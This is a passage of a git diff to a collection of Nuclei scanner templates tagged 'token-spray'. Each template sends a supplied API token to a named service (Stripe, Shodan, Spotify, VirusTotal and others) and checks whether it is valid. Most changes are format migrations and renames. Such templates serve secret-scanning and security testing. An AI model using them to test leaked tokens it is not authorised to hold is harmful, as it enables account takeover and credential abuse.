word - part: body - words: - - '"count":' - - '"userSets":' - - '"user":' - condition: and diff --git a/nuclei-templates/Other/api-savepage.yaml b/nuclei-templates/Other/api-savepage.yaml index a75fabd12a..eaef59b2c4 100644 --- a/nuclei-templates/Other/api-savepage.yaml +++ b/nuclei-templates/Other/api-savepage.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.savepage.io - https://github.com/daffainfo/all-about-apikey/tree/main/savepage + metadata: + max-request: 1 tags: token-spray,savepage self-contained: true -requests: + +http: - method: GET path: - "https://api.savepage.io/v1?key={{token}}&q=https://selfcontained.test" @@ -21,3 +24,5 @@ requests: part: body words: - 'getaddrinfo ENOTFOUND selfcontained.test' + +# digest: 490a0046304402204e42d74af915b48e26f8e5b3ef52406ad7e7564ccabd1919fd950bfbcbb9ecc902202162047f29d81a1cce27ed88245a3c9d6331be3cb73e18858c8b727f778c0d54:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scanii-487.yaml b/nuclei-templates/Other/api-scanii-487.yaml deleted file mode 100644 index 9c9b50f9e0..0000000000 --- a/nuclei-templates/Other/api-scanii-487.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-scanii - -info: - name: Scanii API Test - author: daffainfo - severity: info - reference: - - https://docs.scanii.com/v2.1/resources.html - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md - tags: token-spray,scanii - -self-contained: true -requests: - - raw: - - | - GET https://api.scanii.com/v2.1/ping HTTP/1.1 - Authorization: Basic {{base64(api + ':' + secret)}} - Host: api.scanii.com - - matchers: - - type: word - part: body - words: - - '"key"' - - '"message" : "pong"' - condition: and diff --git a/nuclei-templates/Other/api-scanii-488.yaml b/nuclei-templates/Other/api-scanii-488.yaml new file mode 100644 index 0000000000..a50bcb42a1 --- /dev/null +++ b/nuclei-templates/Other/api-scanii-488.yaml @@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/nuclei-templates/Other/api-scraperapi.yaml b/nuclei-templates/Other/api-scraperapi.yaml index cd56996783..74004f9f24 100644 --- a/nuclei-templates/Other/api-scraperapi.yaml +++ b/nuclei-templates/Other/api-scraperapi.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.scraperapi.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/scraperapi + metadata: + max-request: 1 tags: token-spray,scraperapi self-contained: true -requests: + +http: - method: GET path: - "http://api.scraperapi.com/account?api_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"concurrentRequests"' - '"requestLimit"' condition: and + +# digest: 490a0046304402206581528b6146f4b236024133b4794a75c58849ba7d34f14de80b23481f1c700e022019fff75a44f572ebab929eaaacfb8236d76b0c923438623fc0bb74cb1ad8d144:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scraperbox.yaml b/nuclei-templates/Other/api-scraperbox.yaml index 9befe631ca..b43ab27672 100644 --- a/nuclei-templates/Other/api-scraperbox.yaml +++ b/nuclei-templates/Other/api-scraperbox.yaml @@ -8,10 +8,13 @@ info: reference: - https://scraperbox.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scraperbox + metadata: + max-request: 1 tags: token-spray,scraperbox self-contained: true -requests: + +http: - method: GET path: - "https://api.scraperbox.com/scrape?token={{token}}&url=https://example.com" @@ -26,3 +29,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4a0a0047304502207f36a4754fda5d47376179286a5929f95ecb39833d01276df125df4cbd5b3712022100e471d820cf8e65b92617364b2126738d2dcefb072e6073ae15af81d922a347f2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scrapestack.yaml b/nuclei-templates/Other/api-scrapestack.yaml index b2f5e37dc0..0d41190b96 100644 --- a/nuclei-templates/Other/api-scrapestack.yaml +++ b/nuclei-templates/Other/api-scrapestack.yaml @@ -8,10 +8,13 @@ info: reference: - https://scrapestack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapestack + metadata: + max-request: 1 tags: token-spray,scrapestack self-contained: true -requests: + +http: - method: GET path: - "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://example.com" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4b0a00483046022100eac15c431eb927c4e320c9e035ceca60c466be6beca8cf895164f574c60216a1022100ff782e772cac1246805653374e5809e611e222b90840b47d3ff64ebd78365124:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scrapingant.yaml b/nuclei-templates/Other/api-scrapingant.yaml index 98d0a00d43..f89f273a75 100644 --- a/nuclei-templates/Other/api-scrapingant.yaml +++ b/nuclei-templates/Other/api-scrapingant.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.scrapingant.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingant + metadata: + max-request: 1 tags: token-spray,scrapingant self-contained: true -requests: + +http: - raw: - | POST https://api.scrapingant.com/v1/general HTTP/1.1 @@ -29,3 +32,5 @@ requests: - '"cookies"' - '"status_code"' condition: and + +# digest: 490a0046304402200e65aa9c4e1e016b9b98eee1d51f0a6a711ad509ecf9beb4ca46be64a4daa19d02201f4dd5c3cea44569d06979e257bcf3cfbe8567bb5d1858b57028be0dd9f274aa:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scrapingdog.yaml b/nuclei-templates/Other/api-scrapingdog.yaml index d3522c8d8d..c0fb60e2a6 100644 --- a/nuclei-templates/Other/api-scrapingdog.yaml +++ b/nuclei-templates/Other/api-scrapingdog.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.scrapingdog.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingdog + metadata: + max-request: 1 tags: token-spray,scrapingdog self-contained: true -requests: + +http: - method: GET path: - "https://api.scrapingdog.com/scrape?api_key={{token}}&url=https://example.com/ip&dynamic=false" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4a0a004730450220070eb4b2cd00c50767f563586787b1f6304b7e36b924a320e78560f2ea986d3c022100bdb5b45c07be8ce1634abb44332599ac65233926aae0df73b06eb8de5eaea960:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-screenshotapi.yaml b/nuclei-templates/Other/api-screenshotapi.yaml index 0c6d238794..5851a4dcb3 100644 --- a/nuclei-templates/Other/api-screenshotapi.yaml +++ b/nuclei-templates/Other/api-screenshotapi.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.screenshotapi.net/?ref=webflow - https://github.com/daffainfo/all-about-apikey/tree/main/screenshot-api + metadata: + max-request: 1 tags: token-spray,screenshotapi self-contained: true -requests: + +http: - method: GET path: - "https://shot.screenshotapi.net/screenshot?token={{token}}&url=https://example.com" @@ -31,3 +34,5 @@ requests: - 401 - 400 negative: true + +# digest: 490a00463044022068c08d9876d73e8181765fd57562d760a4114651d93979f971482cc92ea2298902206e89c0c4f3ef9094331bb64b3335fe5e3a94c9c24d0d603634b6077515e43a1a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-securitytrails.yaml b/nuclei-templates/Other/api-securitytrails.yaml index a378b4a3bb..d097f86c9b 100644 --- a/nuclei-templates/Other/api-securitytrails.yaml +++ b/nuclei-templates/Other/api-securitytrails.yaml @@ -8,18 +8,23 @@ info: - https://securitytrails.com - https://docs.securitytrails.com - https://securitytrails.com/corp/api - tags: dns,ssl,recon,securitytrails,token-spray + metadata: + max-request: 1 + tags: recon,securitytrails,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.securitytrails.com/v1/ping + headers: APIKey: "{{token}}" - matchers: - type: word part: body words: - success + +# digest: 490a004630440220776d46c2dcfd5613149208392c8ffdd55892bae59fb3c0f17a8b5ea71a94b1fd02203943d186910d18983cccd6aa1af5f247b0206e8d05426d3622b48101027f57d1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-segment.yaml b/nuclei-templates/Other/api-segment.yaml index 5c95a6ed11..4cd7faa5cf 100644 --- a/nuclei-templates/Other/api-segment.yaml +++ b/nuclei-templates/Other/api-segment.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://reference.segmentapis.com/ + metadata: + max-request: 1 tags: token-spray,segment self-contained: true -requests: + +http: - raw: - | GET https://platform.segmentapis.com/v1beta/workspaces/myworkspace HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"name":' - '"id"' condition: and + +# digest: 4a0a004730450221008e895f72ab2b5caad49f2adea23f2d831a5b49d1fa14c51883eda1551a8790a30220137a80371f75fb0553dc708b87f7ecfede6c3a790b242e76c0be42d0729ed081:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-sendgrid-489.yaml b/nuclei-templates/Other/api-sendgrid-489.yaml index b887b0b7d1..d0d5a48223 100644 --- a/nuclei-templates/Other/api-sendgrid-489.yaml +++ b/nuclei-templates/Other/api-sendgrid-489.yaml @@ -1,12 +1,10 @@ id: api-sendgrid - info: name: Sendgrid API Test author: zzeitlin reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info tags: token-spray,sendgrid - network: - inputs: - data: "ehlo\r\n" @@ -15,7 +13,6 @@ network: read: 1024 host: - "tls://smtp.sendgrid.net:465" - matchers: - type: word words: diff --git a/nuclei-templates/Other/api-sentry.yaml b/nuclei-templates/Other/api-sentry.yaml index f0f802943e..017f674880 100644 --- a/nuclei-templates/Other/api-sentry.yaml +++ b/nuclei-templates/Other/api-sentry.yaml @@ -8,17 +8,22 @@ info: - https://sentry.io - https://docs.sentry.io - https://docs.sentry.io/api/auth + metadata: + max-request: 1 tags: sentry,tracing,tracking,monitoring,token-spray self-contained: true -requests: + +http: - method: GET path: - "https://sentry.io/api/0/projects/" + headers: Authorization: Bearer {{token}} - matchers: - type: status status: - 200 + +# digest: 4a0a0047304502204275c64e6dd711968c80ec90b4a1227527bdd093b5a25d96b9694fde545b53b7022100cf6753f0f673ab5fbed069a4da5f0f29eae9a39f7d299d0ae269917bc505e3e5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-serpstack.yaml b/nuclei-templates/Other/api-serpstack.yaml index c394ad0050..cd34acd409 100644 --- a/nuclei-templates/Other/api-serpstack.yaml +++ b/nuclei-templates/Other/api-serpstack.yaml @@ -8,10 +8,13 @@ info: reference: - https://serpstack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/serpstack + metadata: + max-request: 1 tags: token-spray,serpstack self-contained: true -requests: + +http: - method: GET path: - "http://api.serpstack.com/search?access_key={{token}}&query=mcdonalds" @@ -24,3 +27,5 @@ requests: - '"processed_timestamp"' - '"search_url"' condition: and + +# digest: 4b0a00483046022100e5617e9467eec0004b8d5ea61213affe2e734dafc39987060335cac985f98fc802210094a842acbd2bef636f7cfc866b7bbedce5382b4275849325412479831a6cc1c4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-shodan.yaml b/nuclei-templates/Other/api-shodan.yaml index aec184fcca..a68d0ca1c5 100644 --- a/nuclei-templates/Other/api-shodan.yaml +++ b/nuclei-templates/Other/api-shodan.yaml @@ -10,10 +10,13 @@ info: - https://shodan.io - https://developer.shodan.io - https://developer.shodan.io/api - tags: dns,scan,recon,shodan,token-spray + metadata: + max-request: 1 + tags: recon,shodan,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.shodan.io/api-info?key={{token}} @@ -26,3 +29,5 @@ requests: - '"unlocked"' - '"scan_credits"' condition: and + +# digest: 4b0a00483046022100864b75407975119df732a8e145fe6bbaf86ed26d7bc337d63fcdcd9d3c5fd4d8022100a7c5f073f7b4eb64fba8c9ea12494df3197d42a4457a8cffc36b54bb4c62a75a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-spotify-495.yaml b/nuclei-templates/Other/api-spotify-495.yaml deleted file mode 100644 index 2ccc098209..0000000000 --- a/nuclei-templates/Other/api-spotify-495.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-spotify - -info: - name: Spotify API Test - author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ - severity: info - tags: token-spray,spotify - -requests: - - method: GET - path: - - "https://api.spotify.com/v1/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-spotify.yaml b/nuclei-templates/Other/api-spotify.yaml new file mode 100644 index 0000000000..ee518e36b4 --- /dev/null +++ b/nuclei-templates/Other/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-square-496.yaml b/nuclei-templates/Other/api-square-496.yaml deleted file mode 100644 index 7ccb835189..0000000000 --- a/nuclei-templates/Other/api-square-496.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-square - -info: - name: Square API Test - author: zzeitlin - reference: https://developer.squareup.com/explorer/square/locations-api/list-locations - severity: info - tags: token-spray,square - -self-contained: true -requests: - - method: GET - path: - - "https://connect.squareup.com/v2/locations" - - "https://connect.squareupsandbox.com/v2/locations" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'errors' - negative: true diff --git a/nuclei-templates/Other/api-square.yaml b/nuclei-templates/Other/api-square.yaml new file mode 100644 index 0000000000..f90e538715 --- /dev/null +++ b/nuclei-templates/Other/api-square.yaml @@ -0,0 +1,21 @@ +id: api-square +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: token-spray,square +requests: + - method: GET + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/nuclei-templates/Other/api-strava.yaml b/nuclei-templates/Other/api-strava-498.yaml similarity index 100% rename from nuclei-templates/Other/api-strava.yaml rename to nuclei-templates/Other/api-strava-498.yaml diff --git a/nuclei-templates/Other/api-stripe.yaml b/nuclei-templates/Other/api-stripe.yaml index 16e358e75a..d06b38bd8c 100644 --- a/nuclei-templates/Other/api-stripe.yaml +++ b/nuclei-templates/Other/api-stripe.yaml @@ -3,10 +3,11 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-stytch-500.yaml b/nuclei-templates/Other/api-stytch-500.yaml deleted file mode 100644 index d410066fa0..0000000000 --- a/nuclei-templates/Other/api-stytch-500.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-stytch - -info: - name: Stytch API Test - author: daffainfo - severity: info - reference: - - https://stytch.com/docs/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md - tags: token-spray,stytch - -self-contained: true -requests: - - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(id + ':' + secret)}} - Host: test.stytch.com - Content-Type: application/json - - {"email": "test@stytch.com"} - - matchers: - - type: word - part: body - words: - - '"status_code":' - - '"request_id":' - - '"user_id":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-stytch.yaml b/nuclei-templates/Other/api-stytch.yaml new file mode 100644 index 0000000000..37caf808d3 --- /dev/null +++ b/nuclei-templates/Other/api-stytch.yaml @@ -0,0 +1,31 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + description: User infrastructure for modern applications + reference: + - https://stytch.com/docs/api + - https://github.com/daffainfo/all-about-apikey/tree/main/stytch + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(id + ':' + secret)}} + Host: test.stytch.com + Content-Type: application/json + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-supportivekoala.yaml b/nuclei-templates/Other/api-supportivekoala.yaml index e6a5ad91e1..863b7e4b64 100644 --- a/nuclei-templates/Other/api-supportivekoala.yaml +++ b/nuclei-templates/Other/api-supportivekoala.yaml @@ -8,10 +8,13 @@ info: reference: - https://developers.supportivekoala.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/supportivekoala + metadata: + max-request: 1 tags: token-spray,supportivekoala self-contained: true -requests: + +http: - raw: - | GET https://api.supportivekoala.com/v1/images HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"template"' - '"imageUrl"' condition: and + +# digest: 4a0a00473045022022025c3d0dbb1fb08ea5a1a40150fbc1ba81b59905cd75ed20fe499fdd34fcd7022100affab5c34426b3741ed793826c03a586fdd02d68893c9e27ed63798f871c1173:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-tatum.yaml b/nuclei-templates/Other/api-tatum.yaml index e90ee49a68..a70b9c19be 100644 --- a/nuclei-templates/Other/api-tatum.yaml +++ b/nuclei-templates/Other/api-tatum.yaml @@ -7,22 +7,36 @@ info: reference: - https://apidoc.tatum.io/#tag/Node-RPC - https://docs.tatum.io + metadata: + max-request: 1 tags: defi,dapp,token-spray,blockchain self-contained: true -requests: - - method: POST - path: - - "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}" - headers: - Content-Type: application/json - body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}" +http: + - raw: + - | + GET https://api.tatum.io/v3/tatum/version HTTP/1.1 + Host: api.tatum.io + x-api-key: {{token}} + + matchers-condition: and matchers: - type: word part: body words: - - '"id":' - - '"result":' - - '"jsonrpc":' + - '"baseCommit":' + - '"planName":' + - '"creditLimit":' condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022022f3c9377b666df77d20e15cc981191ea36af68adbfe7466a38d378b739d05d3022100f7a594ab9933abff01150ef1e6eab59084a932cbb361185c4a4f72c4cbca27d1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-thecatapi-502.yaml b/nuclei-templates/Other/api-thecatapi-502.yaml index c6e1d0d1a8..0eb02cde29 100644 --- a/nuclei-templates/Other/api-thecatapi-502.yaml +++ b/nuclei-templates/Other/api-thecatapi-502.yaml @@ -4,9 +4,10 @@ info: name: TheCatApi API Test author: daffainfo severity: info + description: Pictures of cats from Tumblr reference: - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md + - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi tags: token-spray,thecatapi self-contained: true diff --git a/nuclei-templates/Other/api-ticketmaster.yaml b/nuclei-templates/Other/api-ticketmaster.yaml index 8780f43111..dff940016e 100644 --- a/nuclei-templates/Other/api-ticketmaster.yaml +++ b/nuclei-templates/Other/api-ticketmaster.yaml @@ -2,19 +2,22 @@ id: api-ticketmaster info: name: Ticket Master API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://developer.ticketmaster.com/products-and-docs/apis/getting-started/ metadata: verified: true + max-request: 1 tags: token-spray,ticketmaster self-contained: true -requests: + +http: - method: GET path: - "https://app.ticketmaster.com/discovery/v2/events.json?apikey={{token}}" + matchers: - type: word part: body @@ -24,3 +27,5 @@ requests: - '"type"' - '"images"' condition: and + +# digest: 490a004630440220418e96a4c2a83a3ebae9ee186be2fb5fb4679c61ce9fad325ebac05e1f3a1bd602206fe6e80783c71977b9d2b1d90a909b29f96a06e9ae1084fc8fac3e18bcdad6b5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-tink-504.yaml b/nuclei-templates/Other/api-tink.yaml similarity index 100% rename from nuclei-templates/Other/api-tink-504.yaml rename to nuclei-templates/Other/api-tink.yaml diff --git a/nuclei-templates/Other/api-tinypng-505.yaml b/nuclei-templates/Other/api-tinypng-505.yaml index 922e62848b..2cc913788a 100644 --- a/nuclei-templates/Other/api-tinypng-505.yaml +++ b/nuclei-templates/Other/api-tinypng-505.yaml @@ -1,19 +1,16 @@ id: api-tinypng - info: name: TinyPNG API Test author: zzeitlin reference: https://tinypng.com/developers severity: info tags: token-spray,tinypng - requests: - method: POST path: - "https://api.tinify.com/shrink" headers: Authorization: Basic {{base64('api:' + token)}} - matchers: - type: word part: header diff --git a/nuclei-templates/Other/api-todoist.yaml b/nuclei-templates/Other/api-todoist.yaml index 55897d1626..67b54a6ec4 100644 --- a/nuclei-templates/Other/api-todoist.yaml +++ b/nuclei-templates/Other/api-todoist.yaml @@ -8,10 +8,13 @@ info: reference: - https://developer.todoist.com/rest/v1/#overview - https://github.com/daffainfo/all-about-apikey/tree/main/todoist + metadata: + max-request: 1 tags: token-spray,todoist self-contained: true -requests: + +http: - raw: - | GET https://api.todoist.com/rest/v1/projects HTTP/1.1 @@ -26,3 +29,5 @@ requests: - "color" - "name" condition: and + +# digest: 490a0046304402203dbef347f1a662b07de6be4819a80425658784c023602c004abe26aeaf09e5e602205d2622dc6c1cfa6baa62ba5034f1509620b7eaeec485f8429096f5a4f62f7fb2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-twitter-507.yaml b/nuclei-templates/Other/api-twitter.yaml similarity index 100% rename from nuclei-templates/Other/api-twitter-507.yaml rename to nuclei-templates/Other/api-twitter.yaml diff --git a/nuclei-templates/Other/api-urlscan-508.yaml b/nuclei-templates/Other/api-urlscan.yaml similarity index 100% rename from nuclei-templates/Other/api-urlscan-508.yaml rename to nuclei-templates/Other/api-urlscan.yaml diff --git a/nuclei-templates/Other/api-userstack.yaml b/nuclei-templates/Other/api-userstack.yaml index 3cbd93b795..2ee0e8f92d 100644 --- a/nuclei-templates/Other/api-userstack.yaml +++ b/nuclei-templates/Other/api-userstack.yaml @@ -2,14 +2,17 @@ id: api-userstack info: name: User Stack API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://userstack.com/documentation + metadata: + max-request: 1 tags: token-spray,userstack self-contained: true -requests: + +http: - method: GET path: - "http://api.userstack.com/api/detect?access_key={{token}}&ua=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_14_0)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/71.0.3578.98%20Safari/537.36" @@ -22,3 +25,5 @@ requests: - '"name":' - '"brand":' condition: and + +# digest: 4a0a00473045022100da6c0f5774aa06e11b62a466787e94d1fd56fb971809160cef77d19ebba9134402207aa065ee1fe9dfe11535a427db1c7c5585ff8e62b3b37f73e8df6060a3b611af:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-vercel.yaml b/nuclei-templates/Other/api-vercel-510.yaml similarity index 100% rename from nuclei-templates/Other/api-vercel.yaml rename to nuclei-templates/Other/api-vercel-510.yaml diff --git a/nuclei-templates/Other/api-virustotal-512.yaml b/nuclei-templates/Other/api-virustotal-512.yaml new file mode 100644 index 0000000000..fbcb6e2600 --- /dev/null +++ b/nuclei-templates/Other/api-virustotal-512.yaml @@ -0,0 +1,30 @@ +id: api-virustotal + +info: + name: VirusTotal API Test + author: daffainfo + severity: info + reference: + - https://developers.virustotal.com/reference + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md + tags: token-spray,virustotal + +self-contained: true +requests: + - raw: + - | + POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 + Host: www.virustotal.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 86 + + apikey={{token}}&url=google.com + + matchers: + - type: word + part: body + words: + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" + condition: and diff --git a/nuclei-templates/Other/api-virustotal.yaml b/nuclei-templates/Other/api-virustotal.yaml deleted file mode 100644 index f48595c162..0000000000 --- a/nuclei-templates/Other/api-virustotal.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-virustotal - -info: - name: VirusTotal API Test - author: daffainfo - severity: info - reference: - - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - tags: token-spray,virustotal - -self-contained: true -requests: - - raw: - - | - POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 - Host: www.virustotal.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 86 - - apikey={{token}}&url=google.com - - matchers: - - type: word - part: body - words: - - "'verbose_msg':" - - "'scan_date':" - - "'permalink':" - condition: and diff --git a/nuclei-templates/Other/visualstudio.yaml b/nuclei-templates/Other/api-visualstudio-513.yaml similarity index 100% rename from nuclei-templates/Other/visualstudio.yaml rename to nuclei-templates/Other/api-visualstudio-513.yaml diff --git a/nuclei-templates/Other/wakatime.yaml b/nuclei-templates/Other/api-wakatime-514.yaml similarity index 100% rename from nuclei-templates/Other/wakatime.yaml rename to nuclei-templates/Other/api-wakatime-514.yaml diff --git a/nuclei-templates/Other/api-wordnik.yaml b/nuclei-templates/Other/api-wordnik.yaml index dfe89ce8f9..64a1eb4943 100644 --- a/nuclei-templates/Other/api-wordnik.yaml +++ b/nuclei-templates/Other/api-wordnik.yaml @@ -8,10 +8,13 @@ info: reference: - https://developer.wordnik.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/wordnik + metadata: + max-request: 1 tags: token-spray,wordnik self-contained: true -requests: + +http: - method: GET path: - "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"year"' - '"rating"' condition: and + +# digest: 4a0a0047304502201a2b6d2fad91ea3333bb61b78fa75652fcfff29a2a2c572fe64051e4abb5344e0221009d26ccdedcec37c3d3a8937a3c3c7f36d82010a1ad27f391afe5aaec78d6d5cf:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-youtube.yaml b/nuclei-templates/Other/api-youtube-519.yaml similarity index 100% rename from nuclei-templates/Other/api-youtube.yaml rename to nuclei-templates/Other/api-youtube-519.yaml diff --git a/nuclei-templates/Other/api-zenrows.yaml b/nuclei-templates/Other/api-zenrows.yaml index 9f25423c48..5707079f74 100644 --- a/nuclei-templates/Other/api-zenrows.yaml +++ b/nuclei-templates/Other/api-zenrows.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.zenrows.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/zenrows + metadata: + max-request: 1 tags: token-spray,zenrows self-contained: true -requests: + +http: - method: GET path: - "https://api.zenrows.com/v1/?apikey={{token}}&url=https://example.com" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 490a00463044022053400d85ec2ff13f0c35b64bcadd50ad94e1a5dd83e8ee17fc28a0fba7da62cc022032c0210f12b83c7ebe8bd917a35c833b82ad629aa4e67377438baa7f4b673765:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-zerbounce.yaml b/nuclei-templates/Other/api-zerbounce.yaml index 3871e85054..e8abbb1821 100644 --- a/nuclei-templates/Other/api-zerbounce.yaml +++ b/nuclei-templates/Other/api-zerbounce.yaml @@ -2,19 +2,22 @@ id: api-zerobounce info: name: Zerobounce API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://www.zerobounce.net/docs/email-validation-api-quickstart metadata: verified: true + max-request: 1 tags: token-spray,zerobounce self-contained: true -requests: + +http: - method: GET path: - "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12" + matchers: - type: word part: body @@ -23,3 +26,5 @@ requests: - '"start_date":' - '"end_date":' condition: and + +# digest: 4a0a0047304502206c18cf5d42e12eb3f3510a1863d447afabb0217911c4a51f69f9f65157a1d90d022100da8e42f7a75dd698c83e5318ba0fcf6fefb3ecdf023d40ce08c39eeda8f5d18e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-zoomeye.yaml b/nuclei-templates/Other/api-zoomeye.yaml index b0c0d64dd8..900591a027 100644 --- a/nuclei-templates/Other/api-zoomeye.yaml +++ b/nuclei-templates/Other/api-zoomeye.yaml @@ -9,16 +9,19 @@ info: reference: - https://zoomeye.org - https://zoomeye.org/doc - tags: dns,scan,recon,zoomeye,token-spray + metadata: + max-request: 1 + tags: recon,zoomeye,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.zoomeye.org/resources-info + headers: API-KEY: "{{token}}" - matchers: - type: word part: body @@ -27,3 +30,5 @@ requests: - '"stats"' - '"user_info"' condition: and + +# digest: 4a0a0047304502206372862f53fdb27dd7c0ac2c9927ac79c749a8a519ec0337d0073c90839571ad02210090d942a707d0c70e51a42dea9ebac861a7e68846a6a97a290915cb4f75863cf5:922c64590222798bb761d5b6d8e72950 diff --git 